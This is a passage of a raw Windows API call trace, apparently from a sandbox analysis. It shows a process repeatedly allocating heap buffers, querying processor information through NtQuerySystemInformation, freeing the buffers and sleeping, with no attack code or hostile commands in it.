[0214.902] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.902] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.903] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.910] Sleep (dwMilliseconds=0x110) [0214.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.927] Sleep (dwMilliseconds=0x110) [0214.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.947] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.947] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.948] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.948] Sleep (dwMilliseconds=0x110) [0214.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.958] Sleep (dwMilliseconds=0x110) [0214.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.979] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.979] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.980] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.980] Sleep (dwMilliseconds=0x110) [0215.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.006] Sleep (dwMilliseconds=0x110) [0215.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.020] Sleep (dwMilliseconds=0x110) [0215.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.036] Sleep (dwMilliseconds=0x110) [0215.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.052] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.053] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.053] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.053] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.054] Sleep (dwMilliseconds=0x110) [0215.059] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.059] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.067] Sleep (dwMilliseconds=0x110) [0215.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.084] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.084] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.085] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.085] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.085] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.085] Sleep (dwMilliseconds=0x110) [0215.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.098] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.099] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.099] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.099] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.099] Sleep (dwMilliseconds=0x110) [0215.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0215.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.113] Sleep (dwMilliseconds=0x110) [0215.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0215.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0215.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0215.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0215.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0215.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0215.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0215.130] 